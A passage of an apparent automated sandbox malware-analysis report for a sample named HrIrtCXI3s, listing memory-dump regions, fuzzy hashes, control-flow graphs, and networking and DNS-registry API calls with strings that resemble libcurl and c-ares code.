                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: EventSelect$EnumEventsNetwork
                                                      • String ID: N=M$multi.c
                                                      • API String ID: 2170980988-2986268608
                                                      • Opcode ID: 2f8c38f7d2f39a3908a489191adedf7f7919ec7bf58d893276db4347588c232e
                                                      • Instruction ID: 98af4cf89e71e2d44fed13fecaeae03aafcef8d70b76930e9463f026f2701f2d
                                                      • Opcode Fuzzy Hash: 2f8c38f7d2f39a3908a489191adedf7f7919ec7bf58d893276db4347588c232e
                                                      • Instruction Fuzzy Hash: 4DD1F4716083819FE711CF62C881B6BB7E5FF94349F04482EF89593242E7B8E985CB56

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1330 4d7770-4d778e 1331 4d77b6-4d77c2 recv 1330->1331 1332 4d7790-4d7797 1330->1332 1333 4d782e-4d7832 1331->1333 1334 4d77c4-4d77d9 call 4d72a0 1331->1334 1332->1331 1335 4d7799-4d77a1 1332->1335 1334->1333 1337 4d77db-4d7829 call 4d72a0 call 4dcb20 call 858c50 1335->1337 1338 4d77a3-4d77b4 1335->1338 1337->1333 1338->1334
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                      • API String ID: 1507349165-640788491
                                                      • Opcode ID: 48592a5aadbec7caa4675e30f6644ad20c51843398794a077d42af28bcbf09b9
                                                      • Instruction ID: 1d87a757e6883a5f961859fbf53817089ed153b7a1268a1921dffd954a3ce346
                                                      • Opcode Fuzzy Hash: 48592a5aadbec7caa4675e30f6644ad20c51843398794a077d42af28bcbf09b9
                                                      • Instruction Fuzzy Hash: 0B112BB8A093447FE520AB159C5AE277B9CEBC2B68F44091FB80463342F5259D0085B6

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1471 59b180-59b195 1472 59b19b-59b1a2 1471->1472 1473 59b3e0-59b3e7 1471->1473 1474 59b1b0-59b1b9 1472->1474 1474->1474 1475 59b1bb-59b1bd 1474->1475 1475->1473 1476 59b1c3-59b1d0 1475->1476 1478 59b3db 1476->1478 1479 59b1d6-59b1f2 1476->1479 1478->1473 1480 59b229-59b22d 1479->1480 1481 59b3e8-59b417 1480->1481 1482 59b233-59b246 1480->1482 1490 59b41d-59b429 1481->1490 1491 59b582-59b589 1481->1491 1483 59b248-59b24b 1482->1483 1484 59b260-59b264 1482->1484 1485 59b24d-59b256 1483->1485 1486 59b215-59b223 1483->1486 1488 59b269-59b286 call 59af30 1484->1488 1485->1488 1486->1480 1489 59b315-59b33c call 858b00 1486->1489 1497 59b288-59b2a3 call 59b060 1488->1497 1498 59b2f0-59b301 1488->1498 1505 59b3bf-59b3ca 1489->1505 1506 59b342-59b347 1489->1506 1494 59b42b-59b433 call 59b590 1490->1494 1495 59b435-59b44c call 59b590 1490->1495 1494->1495 1508 59b458-59b471 call 59b590 1495->1508 1509 59b44e-59b456 call 59b590 1495->1509 1516 59b2a9-59b2c7 getsockname call 59b020 1497->1516 1517 59b200-59b213 call 59b020 1497->1517 1498->1486 1520 59b307-59b310 1498->1520 1510 59b3cc-59b3d9 1505->1510 1512 59b349-59b358 1506->1512 1513 59b384-59b38f 1506->1513 1529 59b48c-59b4a7 1508->1529 1530 59b473-59b487 1508->1530 1509->1508 1510->1473 1514 59b360-59b382 1512->1514 1513->1505 1515 59b391-59b3a5 1513->1515 1514->1513 1514->1514 1521 59b3b0-59b3bd 1515->1521 1527 59b2cc-59b2dd 1516->1527 1517->1486 1520->1510 1521->1505 1521->1521 1527->1486 1531 59b2e3 1527->1531 1532 59b4a9-59b4b1 call 59b660 1529->1532 1533 59b4b3-59b4cb call 59b660 1529->1533 1530->1491 1531->1520 1532->1533 1538 59b4d9-59b4f5 call 59b660 1533->1538 1539 59b4cd-59b4d5 call 59b660 1533->1539 1544 59b50d-59b52b call 59b770 * 2 1538->1544 1545 59b4f7-59b50b 1538->1545 1539->1538 1544->1491 1550 59b52d-59b531 1544->1550 1545->1491 1551 59b580 1550->1551 1552 59b533-59b53b 1550->1552 1551->1491 1553 59b578-59b57e 1552->1553 1554 59b53d-59b547 1552->1554 1553->1491 1554->1553 1555 59b549-59b54d 1554->1555 1555->1553 1556 59b54f-59b558 1555->1556 1556->1553 1557 59b55a-59b576 call 59b870 * 2 1556->1557 1557->1491 1557->1553
                                                      APIs
                                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 0059B2B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                                      • API String ID: 3358416759-2430778319
                                                      • Opcode ID: 2b75a21f63b74349731503a2e48ae6134800619b17083e02e2791396466eb78e
                                                      • Instruction ID: b55346cbbbd5a17a15440a5e7b86e6aa7087e94a7c6dc83198532bfbdad90022
                                                      • Opcode Fuzzy Hash: 2b75a21f63b74349731503a2e48ae6134800619b17083e02e2791396466eb78e
                                                      • Instruction Fuzzy Hash: 40C18F316043059FFF18DF24DA84A6A7BE1FF88704F058968E8498B3A1EB35ED45CB81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe73d4babd5c1d0768e9cf5fed8bc047a37ec0b7127130282bf4fe8f556a3038
                                                      • Instruction ID: e4477c04dbd4cd7428c2189a757cd349d0d2576445769599022bff8cad25505b
                                                      • Opcode Fuzzy Hash: fe73d4babd5c1d0768e9cf5fed8bc047a37ec0b7127130282bf4fe8f556a3038
                                                      • Instruction Fuzzy Hash: 3D91353060C3898BD3358A2A88907BBB2D5FFC0371F148B2EE999432D4E7789D41D696
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 0b2e6d4a0975c67da4d3ad627c20980aa991a3b7db926481104ad1f2bb0ca8c2
                                                      • Instruction ID: 2bbfd59026d753503024a6294206f98bc94e969043258de3737c7deff269df7b
                                                      • Opcode Fuzzy Hash: 0b2e6d4a0975c67da4d3ad627c20980aa991a3b7db926481104ad1f2bb0ca8c2
                                                      • Instruction Fuzzy Hash: 483197B4909305DFDB00EFB9D58569EBBF0BF44305F00896AE898A7341EB749A48CF52
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0058AA19
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0058AA4C
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0058AA97
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0058AAE9
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0058AB30
                                                      • RegCloseKey.KERNELBASE(?), ref: 0058AB6A
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0058AB82
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0058AC46
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0058AD0A
                                                      • RegEnumKeyExA.KERNELBASE ref: 0058AD8D
                                                      • RegCloseKey.KERNELBASE(?), ref: 0058ADD9
                                                      • RegEnumKeyExA.KERNELBASE ref: 0058AE08
                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0058AE2A
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0058AE54
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0058AF63
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0058AFB2
                                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0058B072
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$Open$CloseEnum
                                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                      • API String ID: 4217438148-1047472027
                                                      • Opcode ID: b5d88d473e52f46cdf79d24bf6c4594006c5c7f0ecd0999844335f6bdcb30ac1
                                                      • Instruction ID: e05804eddd7a4de003904fb82f571f625f5dd0fa8d3b6c89528c75cd2ac93b0d
                                                      • Opcode Fuzzy Hash: b5d88d473e52f46cdf79d24bf6c4594006c5c7f0ecd0999844335f6bdcb30ac1
                                                      • Instruction Fuzzy Hash: 3B729EB1608301ABF710EB24CC85B6B7BE8BF95700F144829F985EB2A1E775E945CB53
                                                      APIs
                                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0050A831
                                                      Strings
                                                      • Trying %s:%d..., xrefs: 0050A7C2, 0050A7DE
                                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 0050AE1F
                                                      • @, xrefs: 0050AC42
                                                      • bind failed with errno %d: %s, xrefs: 0050B080
                                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 0050ADAC
                                                      • Local Interface %s is ip %s using address family %i, xrefs: 0050AE60
                                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0050AD0A
                                                      • cf_socket_open() -> %d, fd=%d, xrefs: 0050A796
                                                      • @, xrefs: 0050A8F4
                                                      • Trying [%s]:%d..., xrefs: 0050A689
                                                      • Could not set TCP_NODELAY: %s, xrefs: 0050A871
                                                      • Local port: %hu, xrefs: 0050AF28
                                                      • Bind to local port %d failed, trying next, xrefs: 0050AFE5
                                                      • cf-socket.c, xrefs: 0050A5CD, 0050A735
                                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0050A6CE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: setsockopt
                                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3981526788-2373386790
                                                      • Opcode ID: f483d5f484fc63dda6297ebb0f8b46d40ee641f29610413314607d822da978d9
                                                      • Instruction ID: 269e01bf43ca0dd4401a31264f3ac0c216692473c2bfba140fa8b682aa49fc20
                                                      • Opcode Fuzzy Hash: f483d5f484fc63dda6297ebb0f8b46d40ee641f29610413314607d822da978d9
                                                      • Instruction Fuzzy Hash: CD62E171608381ABE721CF24C846BAFBBE4FF85314F044919F98997292E771A945CB93

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 625 599740-59975b 626 59975d-599768 call 5978a0 625->626 627 599780-599782 625->627 634 5999bb-5999c0 626->634 635 59976e-599770 626->635 629 599788-5997a0 call 858e00 call 5978a0 627->629 630 599914-59994e call 858b70 RegOpenKeyExA 627->630 629->634 641 5997a6-5997c5 629->641 638 59995a-599992 RegQueryValueExA RegCloseKey call 858b98 630->638 639 599950-599955 630->639 642 599a0c-599a15 634->642 640 599772-59977e 635->640 635->641 653 599997-5999b5 call 5978a0 638->653 639->642 640->629 648 599827-599833 641->648 649 5997c7-5997e0 641->649 654 59985f-599872 call 595ca0 648->654 655 599835-59985c call 58e2b0 * 2 648->655 651 5997e2-5997f3 call 858b50 649->651 652 5997f6-599809 649->652 651->652 652->648 664 59980b-599810 652->664 653->634 653->641 665 599878-59987d call 5977b0 654->665 666 5999f0 654->666 655->654 664->648 670 599812-599822 664->670 674 599882-599889 665->674 669 5999f5-5999fb call 595d00 666->669 679 5999fe-599a09 669->679 670->642 674->669 678 59988f-59989b call 584fe0 674->678 678->666 684 5998a1-5998c3 call 858b50 call 5978a0 678->684 679->642 689 5998c9-5998db call 58e2d0 684->689 690 5999c2-5999ed call 58e2b0 * 2 684->690 689->690 694 5998e1-5998f0 call 58e2d0 689->694 690->666 694->690 700 5998f6-599905 call 5963f0 694->700 705 59990b-59990f 700->705 706 599f66-599f7f call 595d00 700->706 708 599a3f-599a5a call 596740 call 5963f0 705->708 706->679 708->706 714 599a60-599a6e call 596d60 708->714 717 599a1f-599a39 call 596840 call 5963f0 714->717 718 599a70-599a94 call 596200 call 5967e0 call 596320 714->718 717->706 717->708 729 599a16-599a19 718->729 730 599a96-599ac6 call 58d120 718->730 729->717 732 599fc1 729->732 735 599ac8-599adb call 58d120 730->735 736 599ae1-599af7 call 58d190 730->736 734 599fc5-599ffd call 595d00 call 58e2b0 * 2 732->734 734->679 735->717 735->736 736->717 743 599afd-599b09 call 584fe0 736->743 743->732 750 599b0f-599b29 call 58e730 743->750 755 599b2f-599b3a call 5978a0 750->755 756 599f84-599f88 750->756 755->756 762 599b40-599b54 call 58e760 755->762 757 599f95-599f99 756->757 759 599f9b-599f9e 757->759 760 599fa0-599fb6 call 58ebf0 * 2 757->760 759->732 759->760 772 599fb7-599fbe 760->772 768 599f8a-599f92 762->768 769 599b5a-599b6e call 58e730 762->769 768->757 775 599b8c-599b97 call 5963f0 769->775 776 599b70-59a004 769->776 772->732 784 599c9a-599cab call 58ea00 775->784 785 599b9d-599bbf call 596740 call 5963f0 775->785 780 59a015-59a01d 776->780 782 59a01f-59a022 780->782 783 59a024-59a045 call 58ebf0 * 2 780->783 782->734 782->783 783->734 793 599f31-599f35 784->793 794 599cb1-599ccd call 58ea00 call 58e960 784->794 785->784 802 599bc5-599bda call 596d60 785->802 796 599f40-599f61 call 58ebf0 * 2 793->796 797 599f37-599f3a 793->797 813 599cfd-599d0e call 58e960 794->813 814 599ccf 794->814 796->717 797->717 797->796 802->784 812 599be0-599bf4 call 596200 call 5967e0 802->812 812->784 833 599bfa-599c0b call 596320 812->833 822 599d10 813->822 823 599d53-599d55 813->823 817 599cd1-599cec call 58e9f0 call 58e4a0 814->817 834 599cee-599cfb call 58e9d0 817->834 835 599d47-599d51 817->835 828 599d12-599d2d call 58e9f0 call 58e4a0 822->828 827 599e69-599e8e call 58ea40 call 58e440 823->827 850 599e90-599e92 827->850 851 599e94-599eaa call 58e3c0 827->851 854 599d5a-599d6f call 58e960 828->854 855 599d2f-599d3c call 58e9d0 828->855 848 599c11-599c1c call 597b70 833->848 849 599b75-599b86 call 58ea00 833->849 834->813 834->817 840 599dca-599ddb call 58e960 835->840 861 599ddd-599ddf 840->861 862 599e2e-599e36 840->862 848->775 866 599c22-599c33 call 58e960 848->866 849->775 872 599f2d 849->872 859 599eb3-599ec4 call 58e9c0 850->859 881 59a04a-59a04c 851->881 882 599eb0-599eb1 851->882 877 599d71-599d73 854->877 878 599dc2 854->878 855->828 874 599d3e-599d42 855->874 859->717 884 599eca-599ed0 859->884 871 599e06-599e21 call 58e9f0 call 58e4a0 861->871 868 599e38-599e3b 862->868 869 599e3d-599e5b call 58ebf0 * 2 862->869 892 599c35 866->892 893 599c66-599c75 call 5978a0 866->893 868->869 879 599e5e-599e67 868->879 869->879 908 599de1-599dee call 58ec80 871->908 909 599e23-599e2c call 58eac0 871->909 872->793 874->827 889 599d9a-599db5 call 58e9f0 call 58e4a0 877->889 878->840 879->827 879->859 887 59a04e-59a051 881->887 888 59a057-59a070 call 58ebf0 * 2 881->888 882->859 891 599ee5-599ef2 call 58e9f0 884->891 887->732 887->888 888->772 922 599d75-599d82 call 58ec80 889->922 923 599db7-599dc0 call 58eac0 889->923 891->717 916 599ef8-599f0e call 58e440 891->916 900 599c37-599c51 call 58e9f0 892->900 912 599c7b-599c8f call 58e7c0 893->912 913 59a011 893->913 900->775 938 599c57-599c64 call 58e9d0 900->938 932 599df1-599e04 call 58e960 908->932 909->932 912->775 933 599c95-59a00e 912->933 913->780 936 599f10-599f26 call 58e3c0 916->936 937 599ed2-599edf call 58e9e0 916->937 943 599d85-599d98 call 58e960 922->943 923->943 932->862 932->871 933->913 936->937 952 599f28 936->952 937->717 937->891 938->893 938->900 